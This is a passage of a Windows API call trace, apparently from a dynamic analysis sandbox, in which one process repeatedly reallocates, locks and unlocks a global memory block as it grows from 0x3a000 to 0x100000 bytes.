[0097.215] GlobalReAlloc (hMem=0x37000c, dwBytes=0x3a000, uFlags=0x2) returned 0x37000c
[0097.215] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.216] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.216] GlobalUnlock (hMem=0x37000c) returned 0
[0097.216] GlobalReAlloc (hMem=0x37000c, dwBytes=0x3c000, uFlags=0x2) returned 0x37000c
[0097.216] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.216] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.216] GlobalUnlock (hMem=0x37000c) returned 0
[0097.216] GlobalReAlloc (hMem=0x37000c, dwBytes=0x3e000, uFlags=0x2) returned 0x37000c
[0097.216] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.217] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.217] GlobalUnlock (hMem=0x37000c) returned 0
[0097.217] GlobalReAlloc (hMem=0x37000c, dwBytes=0x40000, uFlags=0x2) returned 0x37000c
[0097.217] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.217] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.217] GlobalUnlock (hMem=0x37000c) returned 0
[0097.217] GlobalReAlloc (hMem=0x37000c, dwBytes=0x42000, uFlags=0x2) returned 0x37000c
[0097.217] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.218] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.218] GlobalUnlock (hMem=0x37000c) returned 0
[0097.218] GlobalReAlloc (hMem=0x37000c, dwBytes=0x44000, uFlags=0x2) returned 0x37000c
[0097.218] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.218] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.218] GlobalUnlock (hMem=0x37000c) returned 0
[0097.218] GlobalReAlloc (hMem=0x37000c, dwBytes=0x46000, uFlags=0x2) returned 0x37000c
[0097.218] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.219] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.219] GlobalUnlock (hMem=0x37000c) returned 0
[0097.219] GlobalReAlloc (hMem=0x37000c, dwBytes=0x48000, uFlags=0x2) returned 0x37000c
[0097.219] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.219] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.219] GlobalUnlock (hMem=0x37000c) returned 0
[0097.219] GlobalReAlloc (hMem=0x37000c, dwBytes=0x4a000, uFlags=0x2) returned 0x37000c
[0097.219] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.219] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.219] GlobalUnlock (hMem=0x37000c) returned 0
[0097.220] GlobalReAlloc (hMem=0x37000c, dwBytes=0x4c000, uFlags=0x2) returned 0x37000c
[0097.220] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.220] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.220] GlobalUnlock (hMem=0x37000c) returned 0
[0097.220] GlobalReAlloc (hMem=0x37000c, dwBytes=0x4e000, uFlags=0x2) returned 0x37000c
[0097.220] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.220] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.220] GlobalUnlock (hMem=0x37000c) returned 0
[0097.220] GlobalReAlloc (hMem=0x37000c, dwBytes=0x50000, uFlags=0x2) returned 0x37000c
[0097.221] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.221] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.221] GlobalUnlock (hMem=0x37000c) returned 0
[0097.221] GlobalReAlloc (hMem=0x37000c, dwBytes=0x52000, uFlags=0x2) returned 0x37000c
[0097.221] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.221] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.221] GlobalUnlock (hMem=0x37000c) returned 0
[0097.221] GlobalReAlloc (hMem=0x37000c, dwBytes=0x54000, uFlags=0x2) returned 0x37000c
[0097.221] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.222] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.222] GlobalUnlock (hMem=0x37000c) returned 0
[0097.222] GlobalReAlloc (hMem=0x37000c, dwBytes=0x56000, uFlags=0x2) returned 0x37000c
[0097.222] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.222] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.222] GlobalUnlock (hMem=0x37000c) returned 0
[0097.222] GlobalReAlloc (hMem=0x37000c, dwBytes=0x58000, uFlags=0x2) returned 0x37000c
[0097.222] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.223] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.223] GlobalUnlock (hMem=0x37000c) returned 0
[0097.223] GlobalReAlloc (hMem=0x37000c, dwBytes=0x5a000, uFlags=0x2) returned 0x37000c
[0097.223] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.223] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.223] GlobalUnlock (hMem=0x37000c) returned 0
[0097.223] GlobalReAlloc (hMem=0x37000c, dwBytes=0x5c000, uFlags=0x2) returned 0x37000c
[0097.223] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.224] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.224] GlobalUnlock (hMem=0x37000c) returned 0
[0097.224] GlobalReAlloc (hMem=0x37000c, dwBytes=0x5e000, uFlags=0x2) returned 0x37000c
[0097.224] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.224] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.224] GlobalUnlock (hMem=0x37000c) returned 0
[0097.224] GlobalReAlloc (hMem=0x37000c, dwBytes=0x60000, uFlags=0x2) returned 0x37000c
[0097.224] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.225] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.225] GlobalUnlock (hMem=0x37000c) returned 0
[0097.225] GlobalReAlloc (hMem=0x37000c, dwBytes=0x62000, uFlags=0x2) returned 0x37000c
[0097.225] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.225] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.225] GlobalUnlock (hMem=0x37000c) returned 0
[0097.225] GlobalReAlloc (hMem=0x37000c, dwBytes=0x64000, uFlags=0x2) returned 0x37000c
[0097.225] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.226] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.226] GlobalUnlock (hMem=0x37000c) returned 0
[0097.226] GlobalReAlloc (hMem=0x37000c, dwBytes=0x66000, uFlags=0x2) returned 0x37000c
[0097.226] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.226] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.226] GlobalUnlock (hMem=0x37000c) returned 0
[0097.226] GlobalReAlloc (hMem=0x37000c, dwBytes=0x68000, uFlags=0x2) returned 0x37000c
[0097.226] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.227] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.227] GlobalUnlock (hMem=0x37000c) returned 0
[0097.227] GlobalReAlloc (hMem=0x37000c, dwBytes=0x6a000, uFlags=0x2) returned 0x37000c
[0097.227] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.227] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.227] GlobalUnlock (hMem=0x37000c) returned 0
[0097.227] GlobalReAlloc (hMem=0x37000c, dwBytes=0x6c000, uFlags=0x2) returned 0x37000c
[0097.233] GlobalLock (hMem=0x37000c) returned 0x2f0820
[0097.233] GlobalHandle (pMem=0x2f0820) returned 0x37000c
[0097.233] GlobalUnlock (hMem=0x37000c) returned 0
[0097.233] GlobalReAlloc (hMem=0x37000c, dwBytes=0x6e000, uFlags=0x2) returned 0x37000c
[0097.234] GlobalLock (hMem=0x37000c) returned 0x2f0820
[0097.234] GlobalHandle (pMem=0x2f0820) returned 0x37000c
[0097.234] GlobalUnlock (hMem=0x37000c) returned 0
[0097.234] GlobalReAlloc (hMem=0x37000c, dwBytes=0x70000, uFlags=0x2) returned 0x37000c
[0097.247] GlobalLock (hMem=0x37000c) returned 0x23b0048
[0097.248] GlobalHandle (pMem=0x23b0048) returned 0x37000c
[0097.248] GlobalUnlock (hMem=0x37000c) returned 0
[0097.248] GlobalReAlloc (hMem=0x37000c, dwBytes=0x72000, uFlags=0x2) returned 0x37000c
[0097.253] GlobalLock (hMem=0x37000c) returned 0x2420058
[0097.254] GlobalHandle (pMem=0x2420058) returned 0x37000c
[0097.254] GlobalUnlock (hMem=0x37000c) returned 0
[0097.254] GlobalReAlloc (hMem=0x37000c, dwBytes=0x74000, uFlags=0x2) returned 0x37000c
[0097.254] GlobalLock (hMem=0x37000c) returned 0x2420058
[0097.255] GlobalHandle (pMem=0x2420058) returned 0x37000c
[0097.255] GlobalUnlock (hMem=0x37000c) returned 0
[0097.255] GlobalReAlloc (hMem=0x37000c, dwBytes=0x76000, uFlags=0x2) returned 0x37000c
[0097.316] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.317] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.317] GlobalUnlock (hMem=0x37000c) returned 0
[0097.317] GlobalReAlloc (hMem=0x37000c, dwBytes=0x78000, uFlags=0x2) returned 0x37000c
[0097.323] GlobalLock (hMem=0x37000c) returned 0x23b0048
[0097.324] GlobalHandle (pMem=0x23b0048) returned 0x37000c
[0097.324] GlobalUnlock (hMem=0x37000c) returned 0
[0097.324] GlobalReAlloc (hMem=0x37000c, dwBytes=0x7a000, uFlags=0x2) returned 0x37000c
[0097.330] GlobalLock (hMem=0x37000c) returned 0x2428058
[0097.331] GlobalHandle (pMem=0x2428058) returned 0x37000c
[0097.331] GlobalUnlock (hMem=0x37000c) returned 0
[0097.331] GlobalReAlloc (hMem=0x37000c, dwBytes=0x7c000, uFlags=0x2) returned 0x37000c
[0097.331] GlobalLock (hMem=0x37000c) returned 0x2428058
[0097.332] GlobalHandle (pMem=0x2428058) returned 0x37000c
[0097.332] GlobalUnlock (hMem=0x37000c) returned 0
[0097.332] GlobalReAlloc (hMem=0x37000c, dwBytes=0x7e000, uFlags=0x2) returned 0x37000c
[0097.347] GlobalLock (hMem=0x37000c) returned 0x24b0048
[0097.348] GlobalHandle (pMem=0x24b0048) returned 0x37000c
[0097.348] GlobalUnlock (hMem=0x37000c) returned 0
[0097.348] GlobalReAlloc (hMem=0x37000c, dwBytes=0x80000, uFlags=0x2) returned 0x37000c
[0097.411] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.412] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.412] GlobalUnlock (hMem=0x37000c) returned 0
[0097.412] GlobalReAlloc (hMem=0x37000c, dwBytes=0x82000, uFlags=0x2) returned 0x37000c
[0097.424] GlobalLock (hMem=0x37000c) returned 0x2740020
[0097.425] GlobalHandle (pMem=0x2740020) returned 0x37000c
[0097.425] GlobalUnlock (hMem=0x37000c) returned 0
[0097.425] GlobalReAlloc (hMem=0x37000c, dwBytes=0x84000, uFlags=0x2) returned 0x37000c
[0097.436] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.437] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.437] GlobalUnlock (hMem=0x37000c) returned 0
[0097.437] GlobalReAlloc (hMem=0x37000c, dwBytes=0x86000, uFlags=0x2) returned 0x37000c
[0097.495] GlobalLock (hMem=0x37000c) returned 0x2740020
[0097.496] GlobalHandle (pMem=0x2740020) returned 0x37000c
[0097.496] GlobalUnlock (hMem=0x37000c) returned 0
[0097.496] GlobalReAlloc (hMem=0x37000c, dwBytes=0x88000, uFlags=0x2) returned 0x37000c
[0097.507] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.508] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.508] GlobalUnlock (hMem=0x37000c) returned 0
[0097.508] GlobalReAlloc (hMem=0x37000c, dwBytes=0x8a000, uFlags=0x2) returned 0x37000c
[0097.519] GlobalLock (hMem=0x37000c) returned 0x2740020
[0097.520] GlobalHandle (pMem=0x2740020) returned 0x37000c
[0097.520] GlobalUnlock (hMem=0x37000c) returned 0
[0097.520] GlobalReAlloc (hMem=0x37000c, dwBytes=0x8c000, uFlags=0x2) returned 0x37000c
[0097.531] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.532] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.532] GlobalUnlock (hMem=0x37000c) returned 0
[0097.532] GlobalReAlloc (hMem=0x37000c, dwBytes=0x8e000, uFlags=0x2) returned 0x37000c
[0097.590] GlobalLock (hMem=0x37000c) returned 0x2740020
[0097.591] GlobalHandle (pMem=0x2740020) returned 0x37000c
[0097.591] GlobalUnlock (hMem=0x37000c) returned 0
[0097.591] GlobalReAlloc (hMem=0x37000c, dwBytes=0x90000, uFlags=0x2) returned 0x37000c
[0097.603] GlobalLock (hMem=0x37000c) returned 0x27d0020
[0097.603] GlobalHandle (pMem=0x27d0020) returned 0x37000c
[0097.603] GlobalUnlock (hMem=0x37000c) returned 0
[0097.603] GlobalReAlloc (hMem=0x37000c, dwBytes=0x92000, uFlags=0x2) returned 0x37000c
[0097.615] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.616] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.616] GlobalUnlock (hMem=0x37000c) returned 0
[0097.616] GlobalReAlloc (hMem=0x37000c, dwBytes=0x94000, uFlags=0x2) returned 0x37000c
[0097.629] GlobalLock (hMem=0x37000c) returned 0x2750020
[0097.630] GlobalHandle (pMem=0x2750020) returned 0x37000c
[0097.630] GlobalUnlock (hMem=0x37000c) returned 0
[0097.630] GlobalReAlloc (hMem=0x37000c, dwBytes=0x96000, uFlags=0x2) returned 0x37000c
[0097.690] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.691] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.691] GlobalUnlock (hMem=0x37000c) returned 0
[0097.691] GlobalReAlloc (hMem=0x37000c, dwBytes=0x98000, uFlags=0x2) returned 0x37000c
[0097.703] GlobalLock (hMem=0x37000c) returned 0x2750020
[0097.704] GlobalHandle (pMem=0x2750020) returned 0x37000c
[0097.704] GlobalUnlock (hMem=0x37000c) returned 0
[0097.704] GlobalReAlloc (hMem=0x37000c, dwBytes=0x9a000, uFlags=0x2) returned 0x37000c
[0097.718] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.719] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.719] GlobalUnlock (hMem=0x37000c) returned 0
[0097.719] GlobalReAlloc (hMem=0x37000c, dwBytes=0x9c000, uFlags=0x2) returned 0x37000c
[0097.779] GlobalLock (hMem=0x37000c) returned 0x2750020
[0097.780] GlobalHandle (pMem=0x2750020) returned 0x37000c
[0097.780] GlobalUnlock (hMem=0x37000c) returned 0
[0097.780] GlobalReAlloc (hMem=0x37000c, dwBytes=0x9e000, uFlags=0x2) returned 0x37000c
[0097.794] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.795] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.795] GlobalUnlock (hMem=0x37000c) returned 0
[0097.795] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa0000, uFlags=0x2) returned 0x37000c
[0097.809] GlobalLock (hMem=0x37000c) returned 0x2750020
[0097.812] GlobalHandle (pMem=0x2750020) returned 0x37000c
[0097.812] GlobalUnlock (hMem=0x37000c) returned 0
[0097.812] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa2000, uFlags=0x2) returned 0x37000c
[0097.872] GlobalLock (hMem=0x37000c) returned 0x2800020
[0097.873] GlobalHandle (pMem=0x2800020) returned 0x37000c
[0097.873] GlobalUnlock (hMem=0x37000c) returned 0
[0097.873] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa4000, uFlags=0x2) returned 0x37000c
[0097.886] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.887] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.887] GlobalUnlock (hMem=0x37000c) returned 0
[0097.887] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa6000, uFlags=0x2) returned 0x37000c
[0097.901] GlobalLock (hMem=0x37000c) returned 0x2760020
[0097.902] GlobalHandle (pMem=0x2760020) returned 0x37000c
[0097.902] GlobalUnlock (hMem=0x37000c) returned 0
[0097.902] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa8000, uFlags=0x2) returned 0x37000c
[0097.915] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0097.962] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0097.962] GlobalUnlock (hMem=0x37000c) returned 0
[0097.962] GlobalReAlloc (hMem=0x37000c, dwBytes=0xaa000, uFlags=0x2) returned 0x37000c
[0097.976] GlobalLock (hMem=0x37000c) returned 0x2760020
[0097.993] GlobalHandle (pMem=0x2760020) returned 0x37000c
[0097.993] GlobalUnlock (hMem=0x37000c) returned 0
[0097.993] GlobalReAlloc (hMem=0x37000c, dwBytes=0xac000, uFlags=0x2) returned 0x37000c
[0098.006] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.007] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.007] GlobalUnlock (hMem=0x37000c) returned 0
[0098.007] GlobalReAlloc (hMem=0x37000c, dwBytes=0xae000, uFlags=0x2) returned 0x37000c
[0098.022] GlobalLock (hMem=0x37000c) returned 0x2760020
[0098.023] GlobalHandle (pMem=0x2760020) returned 0x37000c
[0098.023] GlobalUnlock (hMem=0x37000c) returned 0
[0098.023] GlobalReAlloc (hMem=0x37000c, dwBytes=0xb0000, uFlags=0x2) returned 0x37000c
[0098.087] GlobalLock (hMem=0x37000c) returned 0x2810020
[0098.088] GlobalHandle (pMem=0x2810020) returned 0x37000c
[0098.088] GlobalUnlock (hMem=0x37000c) returned 0
[0098.088] GlobalReAlloc (hMem=0x37000c, dwBytes=0xb2000, uFlags=0x2) returned 0x37000c
[0098.104] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.105] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.105] GlobalUnlock (hMem=0x37000c) returned 0
[0098.105] GlobalReAlloc (hMem=0x37000c, dwBytes=0xb4000, uFlags=0x2) returned 0x37000c
[0098.167] GlobalLock (hMem=0x37000c) returned 0x2770020
[0098.168] GlobalHandle (pMem=0x2770020) returned 0x37000c
[0098.168] GlobalUnlock (hMem=0x37000c) returned 0
[0098.168] GlobalReAlloc (hMem=0x37000c, dwBytes=0xb6000, uFlags=0x2) returned 0x37000c
[0098.183] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.184] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.184] GlobalUnlock (hMem=0x37000c) returned 0
[0098.184] GlobalReAlloc (hMem=0x37000c, dwBytes=0xb8000, uFlags=0x2) returned 0x37000c
[0098.200] GlobalLock (hMem=0x37000c) returned 0x2770020
[0098.200] GlobalHandle (pMem=0x2770020) returned 0x37000c
[0098.200] GlobalUnlock (hMem=0x37000c) returned 0
[0098.201] GlobalReAlloc (hMem=0x37000c, dwBytes=0xba000, uFlags=0x2) returned 0x37000c
[0098.264] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.265] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.265] GlobalUnlock (hMem=0x37000c) returned 0
[0098.265] GlobalReAlloc (hMem=0x37000c, dwBytes=0xbc000, uFlags=0x2) returned 0x37000c
[0098.281] GlobalLock (hMem=0x37000c) returned 0x2770020
[0098.282] GlobalHandle (pMem=0x2770020) returned 0x37000c
[0098.282] GlobalUnlock (hMem=0x37000c) returned 0
[0098.282] GlobalReAlloc (hMem=0x37000c, dwBytes=0xbe000, uFlags=0x2) returned 0x37000c
[0098.299] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.300] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.300] GlobalUnlock (hMem=0x37000c) returned 0
[0098.300] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc0000, uFlags=0x2) returned 0x37000c
[0098.364] GlobalLock (hMem=0x37000c) returned 0x2770020
[0098.365] GlobalHandle (pMem=0x2770020) returned 0x37000c
[0098.365] GlobalUnlock (hMem=0x37000c) returned 0
[0098.365] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc2000, uFlags=0x2) returned 0x37000c
[0098.382] GlobalLock (hMem=0x37000c) returned 0x2840020
[0098.383] GlobalHandle (pMem=0x2840020) returned 0x37000c
[0098.383] GlobalUnlock (hMem=0x37000c) returned 0
[0098.383] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc4000, uFlags=0x2) returned 0x37000c
[0098.447] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.448] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.448] GlobalUnlock (hMem=0x37000c) returned 0
[0098.448] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc6000, uFlags=0x2) returned 0x37000c
[0098.464] GlobalLock (hMem=0x37000c) returned 0x2780020
[0098.465] GlobalHandle (pMem=0x2780020) returned 0x37000c
[0098.465] GlobalUnlock (hMem=0x37000c) returned 0
[0098.465] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc8000, uFlags=0x2) returned 0x37000c
[0098.483] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.484] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.484] GlobalUnlock (hMem=0x37000c) returned 0
[0098.484] GlobalReAlloc (hMem=0x37000c, dwBytes=0xca000, uFlags=0x2) returned 0x37000c
[0098.549] GlobalLock (hMem=0x37000c) returned 0x2780020
[0098.550] GlobalHandle (pMem=0x2780020) returned 0x37000c
[0098.550] GlobalUnlock (hMem=0x37000c) returned 0
[0098.550] GlobalReAlloc (hMem=0x37000c, dwBytes=0xcc000, uFlags=0x2) returned 0x37000c
[0098.571] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.572] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.572] GlobalUnlock (hMem=0x37000c) returned 0
[0098.573] GlobalReAlloc (hMem=0x37000c, dwBytes=0xce000, uFlags=0x2) returned 0x37000c
[0098.626] GlobalLock (hMem=0x37000c) returned 0x2780020
[0098.626] GlobalHandle (pMem=0x2780020) returned 0x37000c
[0098.626] GlobalUnlock (hMem=0x37000c) returned 0
[0098.626] GlobalReAlloc (hMem=0x37000c, dwBytes=0xd0000, uFlags=0x2) returned 0x37000c
[0098.644] GlobalLock (hMem=0x37000c) returned 0x2850020
[0098.645] GlobalHandle (pMem=0x2850020) returned 0x37000c
[0098.645] GlobalUnlock (hMem=0x37000c) returned 0
[0098.645] GlobalReAlloc (hMem=0x37000c, dwBytes=0xd2000, uFlags=0x2) returned 0x37000c
[0098.712] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.712] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.712] GlobalUnlock (hMem=0x37000c) returned 0
[0098.712] GlobalReAlloc (hMem=0x37000c, dwBytes=0xd4000, uFlags=0x2) returned 0x37000c
[0098.732] GlobalLock (hMem=0x37000c) returned 0x2790020
[0098.733] GlobalHandle (pMem=0x2790020) returned 0x37000c
[0098.733] GlobalUnlock (hMem=0x37000c) returned 0
[0098.733] GlobalReAlloc (hMem=0x37000c, dwBytes=0xd6000, uFlags=0x2) returned 0x37000c
[0098.750] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.751] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.751] GlobalUnlock (hMem=0x37000c) returned 0
[0098.751] GlobalReAlloc (hMem=0x37000c, dwBytes=0xd8000, uFlags=0x2) returned 0x37000c
[0098.816] GlobalLock (hMem=0x37000c) returned 0x2790020
[0098.817] GlobalHandle (pMem=0x2790020) returned 0x37000c
[0098.817] GlobalUnlock (hMem=0x37000c) returned 0
[0098.817] GlobalReAlloc (hMem=0x37000c, dwBytes=0xda000, uFlags=0x2) returned 0x37000c
[0098.836] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.837] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.837] GlobalUnlock (hMem=0x37000c) returned 0
[0098.837] GlobalReAlloc (hMem=0x37000c, dwBytes=0xdc000, uFlags=0x2) returned 0x37000c
[0098.920] GlobalLock (hMem=0x37000c) returned 0x2790020
[0098.921] GlobalHandle (pMem=0x2790020) returned 0x37000c
[0098.921] GlobalUnlock (hMem=0x37000c) returned 0
[0098.921] GlobalReAlloc (hMem=0x37000c, dwBytes=0xde000, uFlags=0x2) returned 0x37000c
[0098.941] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0098.942] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0098.943] GlobalUnlock (hMem=0x37000c) returned 0
[0098.943] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe0000, uFlags=0x2) returned 0x37000c
[0099.020] GlobalLock (hMem=0x37000c) returned 0x2790020
[0099.022] GlobalHandle (pMem=0x2790020) returned 0x37000c
[0099.022] GlobalUnlock (hMem=0x37000c) returned 0
[0099.022] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe2000, uFlags=0x2) returned 0x37000c
[0099.089] GlobalLock (hMem=0x37000c) returned 0x2880020
[0099.090] GlobalHandle (pMem=0x2880020) returned 0x37000c
[0099.090] GlobalUnlock (hMem=0x37000c) returned 0
[0099.090] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe4000, uFlags=0x2) returned 0x37000c
[0099.110] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.110] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.111] GlobalUnlock (hMem=0x37000c) returned 0
[0099.111] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe6000, uFlags=0x2) returned 0x37000c
[0099.130] GlobalLock (hMem=0x37000c) returned 0x27a0020
[0099.131] GlobalHandle (pMem=0x27a0020) returned 0x37000c
[0099.131] GlobalUnlock (hMem=0x37000c) returned 0
[0099.131] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe8000, uFlags=0x2) returned 0x37000c
[0099.199] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.200] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.200] GlobalUnlock (hMem=0x37000c) returned 0
[0099.200] GlobalReAlloc (hMem=0x37000c, dwBytes=0xea000, uFlags=0x2) returned 0x37000c
[0099.221] GlobalLock (hMem=0x37000c) returned 0x27a0020
[0099.222] GlobalHandle (pMem=0x27a0020) returned 0x37000c
[0099.222] GlobalUnlock (hMem=0x37000c) returned 0
[0099.222] GlobalReAlloc (hMem=0x37000c, dwBytes=0xec000, uFlags=0x2) returned 0x37000c
[0099.291] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.291] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.291] GlobalUnlock (hMem=0x37000c) returned 0
[0099.292] GlobalReAlloc (hMem=0x37000c, dwBytes=0xee000, uFlags=0x2) returned 0x37000c
[0099.311] GlobalLock (hMem=0x37000c) returned 0x27a0020
[0099.311] GlobalHandle (pMem=0x27a0020) returned 0x37000c
[0099.311] GlobalUnlock (hMem=0x37000c) returned 0
[0099.311] GlobalReAlloc (hMem=0x37000c, dwBytes=0xf0000, uFlags=0x2) returned 0x37000c
[0099.378] GlobalLock (hMem=0x37000c) returned 0x2890020
[0099.379] GlobalHandle (pMem=0x2890020) returned 0x37000c
[0099.379] GlobalUnlock (hMem=0x37000c) returned 0
[0099.379] GlobalReAlloc (hMem=0x37000c, dwBytes=0xf2000, uFlags=0x2) returned 0x37000c
[0099.399] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.400] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.400] GlobalUnlock (hMem=0x37000c) returned 0
[0099.400] GlobalReAlloc (hMem=0x37000c, dwBytes=0xf4000, uFlags=0x2) returned 0x37000c
[0099.468] GlobalLock (hMem=0x37000c) returned 0x27b0020
[0099.468] GlobalHandle (pMem=0x27b0020) returned 0x37000c
[0099.468] GlobalUnlock (hMem=0x37000c) returned 0
[0099.468] GlobalReAlloc (hMem=0x37000c, dwBytes=0xf6000, uFlags=0x2) returned 0x37000c
[0099.489] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.490] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.490] GlobalUnlock (hMem=0x37000c) returned 0
[0099.490] GlobalReAlloc (hMem=0x37000c, dwBytes=0xf8000, uFlags=0x2) returned 0x37000c
[0099.558] GlobalLock (hMem=0x37000c) returned 0x27b0020
[0099.558] GlobalHandle (pMem=0x27b0020) returned 0x37000c
[0099.559] GlobalUnlock (hMem=0x37000c) returned 0
[0099.559] GlobalReAlloc (hMem=0x37000c, dwBytes=0xfa000, uFlags=0x2) returned 0x37000c
[0099.580] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.581] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.581] GlobalUnlock (hMem=0x37000c) returned 0
[0099.581] GlobalReAlloc (hMem=0x37000c, dwBytes=0xfc000, uFlags=0x2) returned 0x37000c
[0099.651] GlobalLock (hMem=0x37000c) returned 0x27b0020
[0099.652] GlobalHandle (pMem=0x27b0020) returned 0x37000c
[0099.652] GlobalUnlock (hMem=0x37000c) returned 0
[0099.652] GlobalReAlloc (hMem=0x37000c, dwBytes=0xfe000, uFlags=0x2) returned 0x37000c
[0099.676] GlobalLock (hMem=0x37000c) returned 0x26b0020
[0099.677] GlobalHandle (pMem=0x26b0020) returned 0x37000c
[0099.677] GlobalUnlock (hMem=0x37000c) returned 0
[0099.677] GlobalReAlloc (hMem=0x37000c, dwBytes=0x100000, uFlags=0x2) returned 0x37000c
